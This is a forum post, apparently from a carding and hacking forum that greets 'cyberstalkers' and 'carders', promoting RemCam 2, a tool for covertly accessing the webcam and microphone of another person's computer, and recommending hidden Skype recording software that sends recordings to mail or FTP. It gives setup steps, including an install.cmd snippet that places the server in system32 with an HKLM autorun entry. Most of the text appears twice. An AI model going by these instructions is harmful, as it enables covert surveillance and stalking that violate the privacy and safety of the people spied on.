Teacher
Professional
- Messages
- 2,670
- Reaction score
- 798
- Points
- 113
Hello, cyberstalkers! Hello, random carders! Today we will talk a little about small hacker tricks and strays in terms of software.
Go:
RemCam 2 - a small program for connecting to audio and video devices on a remote computer. The best program for connecting to a webcam and microphone.
The program is not perfect, but it is quite usable, if there was a beckonect, it would certainly be fun. But unfortunately, the author of the "Redsh" program has long since given up and is not developing the project. By the way, the source code is available on the web if I find it, I'll upload it to the archive with the program.
We recommend that you pay attention to the Skype Parental Control program. Which is able to record video and audio in hidden mode (from both interlocutors), automatically, record Skype and other programs that use a webcam, send recorded files to mail or FTP. We talked about this program in detail on our channel earlier.
Remcam Features
Instructions and setup for Remcam
The program itself consists of 2 main modules:
Client — must be run on your computer. You can use this program to connect to a remote webcam.
Server — run only on the computer that you want to monitor. If you accidentally started a server on your machine, read the article below. I'll tell you how to delete it.
We'll put the Client folder aside. All changes will be made with files that are found in the Server folder. For the program to work, all files in this folder must be located on the remote computer.
Open the install. cmd file (do not run it, but open it with an editor(for example, notepad)) and we change these lines here:
All that is specified above will be used in the client to connect to the server. You don't need to touch any other settings in this file without any special need!
How do I delete Remcam?
To remove the program, run the remove. cmd file located in the server directory.
That's all for today, running in the shadows. I will not load you on this warm Friday evening. Stay tuned for more interesting things to come.
Go:
RemCam 2 - a small program for connecting to audio and video devices on a remote computer. The best program for connecting to a webcam and microphone.
The program is not perfect, but it is quite usable, if there was a beckonect, it would certainly be fun. But unfortunately, the author of the "Redsh" program has long since given up and is not developing the project. By the way, the source code is available on the web if I find it, I'll upload it to the archive with the program.
We recommend that you pay attention to the Skype Parental Control program. Which is able to record video and audio in hidden mode (from both interlocutors), automatically, record Skype and other programs that use a webcam, send recorded files to mail or FTP. We talked about this program in detail on our channel earlier.
Remcam Features
- Select the video capture format (video format, resolution).
- Supports common RGB, YUV, and JPEG formats (BI_RGB, YUY2, UYVY, NV12, YV12, I420, Y8, MJPG, and others). You don't need to install any additional codecs to decode these formats.
- Compression of a video stream to JPEG, with a configurable degree of quantization.
- Select the audio capture and transmission format (number of channels, sample rate).
- Encoding of the audio stream in IMA ADPCM.
- Automatic balancing of audio and video streams when the channel capacity is low.
- Optional ZLIB-traffic compression.
- Indicators of traffic usage and CPU usage on the local and remote systems.
- Optional password protection of the server (simple md5 authentication with salt).
- Small application size (server — 180.5 kb). No additional files or libraries are required.
- Address book for servers with the ability to import and export.
Instructions and setup for Remcam
The program itself consists of 2 main modules:
- Client
- Server (server)
Client — must be run on your computer. You can use this program to connect to a remote webcam.
Server — run only on the computer that you want to monitor. If you accidentally started a server on your machine, read the article below. I'll tell you how to delete it.
We'll put the Client folder aside. All changes will be made with files that are found in the Server folder. For the program to work, all files in this folder must be located on the remote computer.
Open the install. cmd file (do not run it, but open it with an editor(for example, notepad)) and we change these lines here:
Code:
@echo off
set dest=%systemroot%\system32
set exe=cam2_sv.exe
set pass=1234 set port=57011 set arun=HKLM
All that is specified above will be used in the client to connect to the server. You don't need to touch any other settings in this file without any special need!
How do I delete Remcam?
To remove the program, run the remove. cmd file located in the server directory.
That's all for today, running in the shadows. I will not load you on this warm Friday evening. Stay tuned for more interesting things to come.